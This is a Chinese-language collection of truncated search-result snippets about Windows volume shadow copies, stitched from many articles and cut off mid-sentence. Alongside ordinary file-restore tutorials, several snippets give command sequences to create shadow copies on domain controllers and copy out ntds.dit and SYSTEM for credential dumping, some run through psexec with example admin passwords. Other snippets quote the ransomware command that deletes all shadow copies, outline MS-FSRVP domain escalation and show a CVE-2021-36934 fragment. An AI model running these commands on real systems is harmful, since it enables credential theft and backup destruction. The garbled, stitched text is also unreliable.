影响平台:Windows 侵害的用户:任何组织 威胁程度:高 为了令勒索攻击实施有效,勒索软件进行的一个常见行动是卷影备份(即影子副本),从而使受害者无法恢复任何已加密的文件。...VSS架构 在我们开始之前,关于卷影复制架构,有几个重要元素读者应该熟悉。 卷影复制服务(VSS):该服务负责协调执行影子复制相关操作的实体之间的所有动作,如相关的编写者和提供者。...它是处理影子副本删除尝试时最常见的目标。系统提供者采用了写后复制(CoW)机制,因此快照只保存这些更改被保存在指定的“ diff area”存储位置,通常是在同一个卷上。...但它们也可以保存在任何足够大的NTFS卷上。 现有的删除方法 有两种方法可以删除影子副本。第一种是使用命令行工具明确地删除影子副本,或者以各种介入API方式编程(我们将在此后面介绍)。...(如果还没有的话) 4.接下来,通过发送FSCTL_DISMOUNT_VOLUME和IOCTL_VOLUME_OFFLINE禁用卷。 5.打开备份卷的句柄(即C:,影子副本属性中的 “原始卷”)。
最近由于工作比较忙,再加上年底很多项目收尾,没有时间来写博,今天有一个朋友问到了关于Windows 2003卷影副本的功能,说是只能进行整盘还原,从本身来说,当我们查看磁盘属性的时候是这样子的,这和Windows...R2有所不同,在Windows 2008 R2的时候我们可以直接在磁盘属性中还原文件,其实在Windows 2003下也可以实现文件级的恢复,下面我们就来说一下操作过程: 在Windows 2003卷影副本中要进行文件级的恢复...打开快照副本后,我们可以根据自己的需求选择要恢复的数据即可; 注意:可能由于服务器性能等其它方面的原因,在恢复的时候如果出现路径错误或文件占用等情况,重启文件服务器再进行恢复即可; 小秘密:快照恢复客户端程序安装有用户端...,也可以实现数据恢复,操作方式一样; 至此,基于Windows Server 2003卷影副本恢复功能实现;
不过,减少你磁盘空间的也可能是在windows server 2008 r2下开启的卷影复制功能。如下图: ?...开启卷影复制功能后,属性选项下就会有“previous versions”和"shadow copies“选项,具体设置与开启方式,可以参考下面我从帮助中截取的文字: How do I enable and
在一般情况下系统运维人员会利用卷影拷贝服务(volume Shadow Copy Server,VSS)实现ntds.dit的拷贝,VSS本质上属快照(Snamshot)技术的一种,主要用于备份和恢复(...ntdsutil snapshot "delete {b425cef1-c73c-4be5-ad86-522c27a18180}" quit quit 利用vssadmin提取ntds.dit 创建C盘的卷影拷贝...vssadmin create shadow /for=c: 卷影副本 ID: {6d2ab801-10ca-4890-8b89-e8051ddf0286} 卷影副本卷名: \?...\GLOBALROOT\Device\HarddiskVolumeShadowCopy2 在创建的卷影拷贝中将ntds.dit复制出来 copy \\?...cscript //nologo vssown.vbs /start 创建一个C盘的卷影拷贝 cscript vssown.vbs /create c 列出当前卷影拷贝 cscript vssown.vbs
在一般情况下系统运维人员会利用卷影拷贝服务(volume Shadow Copy Server,VSS)实现ntds.dit的拷贝,VSS本质上属快照(Snamshot)技术的一种,主要用于备份和恢复(...vssadmin create shadow /for=c: 80710576b8e06c2e766274c16cc69b12.png 卷影副本 ID: {6d2ab801-10ca-4890-8b89...-e8051ddf0286} 卷影副本卷名: \?...\GLOBALROOT\Device\HarddiskVolumeShadowCopy2 在创建的卷影拷贝中将ntds.dit复制出来 copy \\?...cscript //nologo vssown.vbs /start e034a960d16409a03e850acae125243c.png 创建一个C盘的卷影拷贝 cscript vssown.vbs
2.利用vssadmin提取ntds.dit 创建C盘的卷影拷贝 vssadmin create shadow /for=c: ?...卷影副本 ID: {6d2ab801-10ca-4890-8b89-e8051ddf0286} 卷影副本卷名: \\?...\GLOBALROOT\Device\HarddiskVolumeShadowCopy2 在创建的卷影拷贝中将ntds.dit复制出来 copy \\?...启动卷影拷贝服务 cscript //nologo vssown.vbs /start ? 创建一个C盘的卷影拷贝 cscript vssown.vbs /create c ?...删除卷影拷贝 cscript vssown.vbs /delete {F27E8849-8BFD-44E1-B6D7-C851198E971D} ?
它可以用于创建或删除卷影副本,列出卷影副本的信息(只能管理系统Provider创建的卷影副本)。...还可以用于显示所有安装的所有卷影副本写入程序(writers)和提供程序(providers),以及改变卷影副本存储空间(即所谓的“diff 空间”)的大小等。.../列出当前卷影副本 cscript vssown.vbs /delete /删除卷影副本 开始先启动卷影复制服务,如图6-9所示,输入命令: cscript vssown.vbs /start 图6...-9启动卷影复制服务 创建一个C盘的卷影副本,如图6-10所示,输入命令: cscript vssown.vbs /create c 图6-10创建快照 列出当前卷影副本,如图6-11所示,输入命令:...卷影副本位置为 \\?
使用 Windows 本地卷影拷贝服务,就可以获得文件的副本(类似与虚拟机的快照) 使用卷影拷贝服务提取 ntds.dit 在活动目录中,所有的数据都保存在 ntds.dit 文件中。...只能管理系统 Provider 创建的卷影拷贝)、显示已安装的所有卷影拷贝写入程序(writers)和提供程序(providers),以及改变卷影拷贝的存储空间(即所谓的“diff空间”)的大小等。...可用于创建和删除卷影拷贝,以及启动和停止卷影拷贝服务。...创建一个 C 盘的卷影拷贝: cscript vssown.vbs /create c ? 列出当前卷影拷贝: cscript vssown.vbs /list ?...监控卷影拷贝服务的使用情况 通过监控卷影拷贝服务的使用情况,可以及时发现攻击者在系统中进行的一些恶意操作。 监控卷影拷贝服务及任何涉及活动目录数据库文件(ntds.dit)的可疑操作行为。
点击了“导出”之后,ShadowExplorer将会显示一个对话框让你选择将文件恢复到哪里,选择好之后点击“确认”(OK)即可: 为什么恶意软件会尝试删除卷影副本?...计算机勒索软件在感染了Windows系统并加密了目标用户的文件之后,通常都会尝试删除卷影副本。...大家已经看到了,使用卷影副本来恢复文件是多么的简单,那么勒索软件当然不想用户这么轻松地就恢复了自己的文件!...当勒索软件尝试删除卷影副本时,通常使用的是下面这行命令: C:\Windows\Sysnative\vssadmin.exe"Delete Shadows /All /Quiet 这条命令执行之后,Windows...如果用户允许执行,那么vssadmin.exe将会删除目标主机中所有驱动器的卷影副本。
卷影副本是Windows命令行一种即便被操作系统使用也能够用于管理员备份计算机,卷,文件的实用程序。...卷影副本集 ID: {9ddcbac4-00c2-4383-add4-abb96e190399} 的内容 在创建时间: 2018/9/7 22:48:01 含有 1 个卷影副本...\Volume{f73dd843-9b04-11e8-99c6-806e6f6e6963}\ 卷影副本卷...成功地创建了 'c:\' 的卷影副本 卷影副本 ID: {e32bb2a2-5033-40cf-9892-5b49d6f5611c} 卷影副本卷名: \\?...确实要删除 1 卷影副本吗(Y/N): [N]? Y 成功地删了 ? 打包拷贝!Get END
AD域控机器上运行“vssadmin”命令,“vssadmin”命令将生成“C”盘的卷影副本,并且从该卷影副本我们可以复制“ntds.dit”和“SYSTEM”文件。...在创建“C”盘卷影副本之后,我们需要将“ntds.dit”和“SYSTEM”文件从该卷影副本复制到我们具有Web shell访问权限的机器上,即Windows域机器“LABONE”。...首先,我们先来检查下是否有“C”盘的卷影副本可用。...“out.txt”文件内容显示,目标域控机器到目前为止并没有任何的卷影副本。 让我们创建一个“C”盘的卷影副本,以窃取“ntds.dit”和“SYSTEM”文件。...“out.txt”文件的内容将告诉我们卷影副本的位置。 ? 在以上截图中我们可以看到,卷影副本的卷名为“\?
windows vista下的备份与还原功能非常强大,除了系统还原,还有卷影副本、备份副本、complete pc备份等。 本文遵旨在于防止用户混淆这些备份还原技术、明确各种技术适用的场合。...1、卷影副本 我认为,对于那些日常文件,且用户不对其进行手动备份的话,这个功能最有用。 ? 卷影副本可以是计算机上的文件的副本或者网络计算机上的共享文件的副本。...如果打开“系统保护”,Windows 将自动创建自上次创建还原点之后进行修改的文件的卷影副本。通常每天创建一次还原点。 卷影副本对于要求 Windows 正常运行的文件和文件夹不可用。...如果在还原之后使用“磁盘清理”删除还原点,“磁盘清理”还将删除卷影副本。 2、备份副本 一般是手动进行备份的。 若要确保不会丢失在计算机上创建、修改和存储的文件,应该定期备份它们。...从网络位置还原卷影副本也很相似,只要计算机连接到网络并且网络位置可用(计算机已经打开并且您有权限访问计算机或磁盘)。
02、利用VSS实现ntds.dit文件提取 (1)vssadmin Windows卷影工具,使用Vssadmin来管理VSS,用来创建和删除卷影拷贝。...#创建一个新的卷影副本 vssadmin create shadow /for=c: #将ntds.dit文件复制到新的位置 copy \\?...\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\NTDS\ntds.dit c:\ntds.dit #删除卷影副本 vssadmin delete...exit b、进入C:\Windows\System32目录下执行: diskshadow /s C:\command.txt (4)vssown vssown 是一个 vbs 脚本,可以创建和删除卷影副本...vssown.vbs /start #创建一个C盘的卷影拷贝 cscript vssown.vbs /create c #列出卷影考本 cscript vssown.vbs /list #将目标文件复制出来
脚本文件可以包含以下行,以便创建新的卷影副本,装入新驱动器,执行复制命令并删除卷影副本。...直接从解释器运行以下命令将列出系统的所有可用卷影副本。 diskshadow LIST SHADOWS ALL ?...然后,它远程执行复制命令,以便将卷影副本中的NTDS.DIT文件解压缩到目标系统上的另一个目录中。...vssadmin 卷影副本是Windows命令行实用程序,使管理员可以备份计算机,卷和文件,即使它们正在被操作系统使用。...vssown 与vssadmin实用程序类似,它是一个可视化基本脚本,可以创建和删除卷影副本,从卸载的卷影副本运行任意可执行文件,以及启动和停止卷影复制服务。
发现相关文件后,只需解析内容提取有用的信息即可: 阻止系统恢复 删除卷影副本 卷影副本是 Windows Server 2003 首次引入的备份功能。...目前卷影副本已经扩展到包括用于创建卷影副本的多种模式,包括在特定时间点创建文件系统的完整快照。这些备份旨在最小化花费的时间和硬盘空间,差异备份技术的存储需求比传统全盘存储的要求小得多。...默认情况下,卷影副本是在 Windows 创建系统还原点时创建的,许多时候还原点是系统的日常任务。...不管使用哪种创建模式,卷影副本现在都是 Windows 内置备份和恢复工具的核心,这也使得卷影副本成为勒索软件攻击的目标,从而让受害者更难从勒索中恢复文件。...删除备份 除了已经讨论过的卷影副本外,Windows 还支持全盘备份,该方式使用整个文件系统的副本。如前所述,这种方式要大得多,会占用更多的资源。
与域控建立空连接net use \\192.168.1.11\ipc$ "123456" /user:"safe-duck\administrator" 2.psexec对域控执行命令查看域控是否建立了卷影副本...当前没有卷影副本,则需要手工创建。...3.手工创建卷影副本 psexec \\192.168.1.11 -u safe-duck\administrator -p "123456" -h cmd /c "vssadmin create...4.复制卷影副本到本地 ①将ntds文件拷贝到本地服务器 psexec \\192.168.1.11 -u "safe-duck\administrator" -p "123456" -h cmd /c...5.将拷贝的卷影副本文件放进kali,使用工具读取ntds文件hash内容。
根据 Microsoft 文档,文件服务器远程 VSS 协议 ( MS-FSRVP ) 用于在远程计算机上创建文件共享的卷影副本、执行应用程序备份以及恢复 SMB2 文件共享上的数据。...为了让域控制器执行这些操作,需要从服务器角色安装文件服务器 VSS 代理服务。但是,此协议公开了两种可用于域升级的方法,因为它们都依赖于远程 UNC 路径。...为了能够将此协议用于攻击性操作,域控制器应安装角色“文件服务器 VSS 代理服务”。 在实际实施攻击之前,收集机器帐户控制器的 NTLMv2 哈希可用作服务正在运行且域升级可行的验证。
kb.cert.org/vuls/id/506989和twitter上jonasLyk的文章复现 漏洞影响 漏洞出现时间是7月20日,允许普通用户通过windows volumeshadowcopy读取卷影中的...漏洞前提 一、系统存在卷影 windows在MSI或者Windows Update 安装中,如果系统磁盘大于128 GB,则系统会自动创建还原点。...BOOL CVE_2021_36934() { //打开并读取卷影文件 HANDLE rFile = CreateFile(L"\\\\.
如果在系统上有足够的权限,那么就可以创建磁盘的卷影副本并尝试从那里提取机密。...但在此之前,对于那些不熟悉卷影副本的人: 卷影拷贝是 Microsoft Windows 中的一项技术,可以创建计算机文件或卷的备份副本或快照,即使它们正在使用中 为了卷影与副本进行交互,有 2 种可用的方法...,如下图所示: 快速创建卷影副本很容易,只需要指定创建副本的卷和上下文: (Get-WmiObject -Class win32_shadowcopy -List).create("C:\", "ClientAccessible...") 为此,我们可以创建一个符号链接,以便从本地资源管理器轻松访问卷影副本: $link = (Get-WmiObject -Class win32_shadowcopy).deviceobject...+ "/" cmd /c mklink /d C:\shadowcopy "$link" 一旦准备好使用卷影副本,那就可以简单地使用 -Thorough 选项运行诸如 Invoke-SessionGopher.ps1
- gets the remote processes and owners on a remote server 获取域方法 SYSVOL SYSVOL是指存储域公共文件服务器副本的共享文件夹...具体详细资料查看: https://technet.microsoft.com/en-us/library/cc772829(v=ws.10).aspx 使用VSS卷影副本 什么是卷影副本?...卷影副本,也称为快照,是存储在Data Protection Manager(DPM)服务器上的副本的时间点副本。副本是文件服务器上单个卷的受保护共享,文件夹和文件的完整时间点副本。...获取系统SAM文件等 使用VSS卷影副本(通过WMI或PowerShell的远程处理)远程提取NTDS.DIT 窗口有一个名为WMI的内置管理组件,支持远程执行(需要管理员权限).WMIC是在远程计算机上执行命令的...使用NTDSUTIL的IFM创建(VSS卷影副本)在DC上本地引用NTDS.DIT NTDSUtil是本地处理AD DB的命令实用程序(ntds.dit),并为DCPromo启用IFM集创建.IFM与DCPromo
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
